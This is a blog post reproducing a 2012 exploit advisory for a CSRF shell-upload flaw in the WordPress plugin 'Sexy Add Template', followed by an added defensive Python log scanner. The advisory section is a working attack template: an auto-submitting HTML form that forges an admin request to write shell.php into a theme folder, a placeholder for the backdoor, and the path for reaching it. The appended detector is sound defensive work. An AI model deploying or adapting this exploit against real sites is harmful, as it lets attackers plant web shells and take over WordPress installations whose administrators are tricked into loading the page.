Friday 19 April 2013

Wordpress Plugin Sexy Add Template



 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 |||   Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability    |||
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 ./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability
 ./Link Download : http://wordpress.org/extend/plugins/sexy-add-template/
 ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
 ./Security Risk : [ Critical Level ]
 ./Category XPL  : [ WebApps/ZeroDay ]
 ./Tested On     : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
 ./Time & Date   : September, 22 2012. 10:27 AM. Jakarta, Indonesia.
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 |||                        -=[ Use It At Your Risk ]=-                        |||
 |||               This Was Written For Educational Purposes Only              |||
 |||               Author Will Not Be Responsible For Any Damage               |||
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

 #################################################################################
 #
 # [ Information Details ]
 # - Wordpress Plugin Sexy Add Template:
 # The plugin allows an attacker to upload a shell through CSRF.
 # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vulnerable to CSRF: the request does not require the "wpnonce" verification code.
 #
 # <html>
 # <head>
 # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
 # </head>
 # <body onload="document.form0.submit();">
 # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
 # <input type="hidden" name="newfile" value="yes" />
 # <input type="hidden" type="text" value="shell.php" name="AM_filename">
 # <textarea type="hidden" name="AM_file_content">
 # [ Your Script Backdoor/Shell ]
 # </textarea>
 # </form>
 # </body>
 # </html>
 #
 # - Access Shell:
 # http://localhost/wp-content/themes/[theme-name]/shell.php
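
For defenders, a log check for the pattern described above: a POST to the plugin's `AM-sexy-handle` page whose Referer is not the site itself, followed by a direct request for a PHP file inside a theme directory. This is an added example, not part of the original advisory; the Combined Log Format, the host `blog.example`, the function name `scan` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD path proto" status size "referer" ...
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)
# A PHP file requested directly from the top level of a theme directory.
THEME_PHP = re.compile(r'^/wp-content/themes/[^/]+/[^/]+\.php$')

def scan(lines, site_host):
    """Return (suspect_posts, theme_php_hits) found in access-log lines."""
    suspect_posts, theme_hits = [], []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue
        url = urlsplit(m['path'])
        page = parse_qs(url.query).get('page', [''])[0]
        if (m['method'] == 'POST' and url.path.endswith('/wp-admin/themes.php')
                and page == 'AM-sexy-handle'):
            # A form submitted from the real admin screen carries a same-site
            # Referer; a missing ("-") or foreign one suggests a forged request.
            if urlsplit(m['referer']).hostname != site_host:
                suspect_posts.append((m['ts'], m['ip'], m['referer']))
        elif suspect_posts and m['status'] == '200' and THEME_PHP.match(url.path):
            # POST bodies are not logged, so the written filename is unknown;
            # report any theme PHP file served after a suspect POST.
            theme_hits.append((m['ts'], m['ip'], url.path))
    return suspect_posts, theme_hits

# Constructed sample log lines (documentation IP ranges, invented hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Sep/2012:10:20:01 +0700] "POST /wp-admin/themes.php?page=AM-sexy-handle HTTP/1.1" 200 5120 "http://blog.example/wp-admin/themes.php?page=AM-sexy-handle" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Sep/2012:10:20:05 +0700] "GET /wp-content/themes/twentyeleven/style.css HTTP/1.1" 200 900 "http://blog.example/" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Sep/2012:10:27:00 +0700] "POST /wp-admin/themes.php?page=AM-sexy-handle HTTP/1.1" 200 5120 "http://other-site.example/page.html" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Sep/2012:10:27:30 +0700] "GET /wp-content/themes/twentyeleven/shell.php HTTP/1.1" 200 312 "-" "curl/7.27"',
    '198.51.100.9 - - [22/Sep/2012:10:27:40 +0700] "GET /wp-content/themes/twentyeleven/missing.php HTTP/1.1" 404 210 "-" "curl/7.27"',
]

if __name__ == '__main__':
    posts, hits = scan(SAMPLE_LOG, 'blog.example')
    print('suspect POSTs:', posts)
    print('theme PHP files served afterwards:', hits)
```
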
